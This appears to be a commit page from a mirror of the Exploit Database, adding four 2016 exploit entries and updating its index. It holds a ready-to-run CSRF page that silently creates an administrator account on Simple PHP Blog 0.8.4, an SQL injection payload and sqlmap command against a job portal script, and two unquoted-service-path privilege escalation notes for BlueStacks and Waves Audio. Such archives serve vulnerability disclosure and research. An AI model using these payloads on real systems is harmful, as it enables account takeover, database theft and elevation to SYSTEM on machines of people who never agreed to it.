bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-08

Browse source 
4 new exploits

MLM Unilevel Plan Script v1.0.2 - SQL Injection
MLM Unilevel Plan Script 1.0.2 - SQL Injection

Comodo Dragon Browser - Unquoted Service Path Privilege Escalation

Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
Entrepreneur Job Portal Script - SQL Injection
BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation
Waves Audio Service - Unquoted Service Path Privilege Escalation
This commit is contained in:
Offensive Security 2016-10-08 05:01:18 +00:00
parent cd9e638108
commit cda049fa54
5 changed files with 207 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -36587,9 +36587,13 @@ id,file,description,date,author,platform,type,port
40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0 40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0 40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0 40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0 40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0

Can't render this file because it is too large.

66
platforms/php/webapps/40475.txt Executable file
View file

@ -0,0 +1,66 @@
<!--
=========================================================================================================
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
=========================================================================================================
# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
Admin)
# Author: Besim
# Google Dork: -
# Date: 07/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://simpleblogphp.com/
# Software Link: https://sourceforge.net/projects/sphpblog/
# Version: 0.8.4
# Tested on: Ubuntu 14.04.5
Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
in place)
meaning that if an admin user can be tricked to visit a crafted URL created
by
attacker (via spear phishing/social engineering), a form will be submitted
to (*http://localhost/simple/manage_users.php?action=update&type=new
<http://localhost/simple/manage_users.php?action=update&type=new>*) that
will add a new user as administrator.
Once exploited, the attacker can login to the admin panel
(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
using the username and the password he posted in the form.
*CSRF PoC Code*
=============
-->
<html>
<body>
<form action="
http://localhost/simple/manage_users.php?action=update&type=new"
method="POST">
<input type="hidden" name="sUsername" value="Besim" />
<input type="hidden" name="sFullname" value="Besim" />
<input type="hidden" name="sPassword" value="mehmet" />
<input type="hidden" name="sEmail" value="mehmet&#64;yopmail&#46;com"
/>
<input type="hidden" name="sAvatar" value="" />
<input type="hidden" name="sActive" value="on" />
<input type="hidden" name="sModComments" value="on" />
<input type="hidden" name="sDeleteEntries" value="on" />
<input type="hidden" name="sEditAny" value="on" />
<input type="hidden" name="submit" value="Create&#32;User" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
--
Besim ALTiNOK

52
platforms/php/webapps/40479.txt Executable file
View file

@ -0,0 +1,52 @@
[x]========================================================================================================================================[x]
| Title : Entrepreneur Job Portal Script SQL Injection
| Software : Entrepreneur Job Portal Script
| Version : 2.06
| Vendor : http://www.i-netsolution.com/
| Demo : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208
| Date : 07 October 2016
| Author : OoN_Boy
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $353 - $1399
| Description : Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features.
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept SQL 1 : http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21
| Proof of concept SQL 2 : http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21
|
| Admin Page : http://localhost/[path]/admin/index.php
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit With Sqlmap
sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536'
---
Parameter: cmpid (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
---
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id
| Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
| k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Hi All long time no see ^_^
[x]========================================================================================================================================[x]

51
platforms/windows/local/40477.txt Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: BlueStacks 2.5.55 Unquoted Service Path Privilege Escalation
# Date: 24/09/2016
# Author: Yunus YILDIRIM (@Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH)
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Category: local
# Vendor Homepage: http://www.bluestacks.com/
# Version: Software Version <= 2.5.55
# Tested on: Windows 7-10 x86/x64
1. Description
BlueStacks Log Rotator Service (BstHdLogRotatorSvc) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
C:\>sc qc BstHdLogRotatorSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BstHdLogRotatorSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BlueStacks Log Rotator Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
Additional notes :
Fixed in version v2.5.61
Vulnerability Disclosure Timeline:
=========================
24/09/2016 - Contact With Vendor
28/09/2016 - Vendor Response
04/10/2016 - Release Fixed Version

31
platforms/windows/local/40478.txt Executable file
View file

@ -0,0 +1,31 @@
Waves Audio Service: http://www.maxx.com
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Max audio drivers (dell default ones) installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\WINDOWS\system32>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem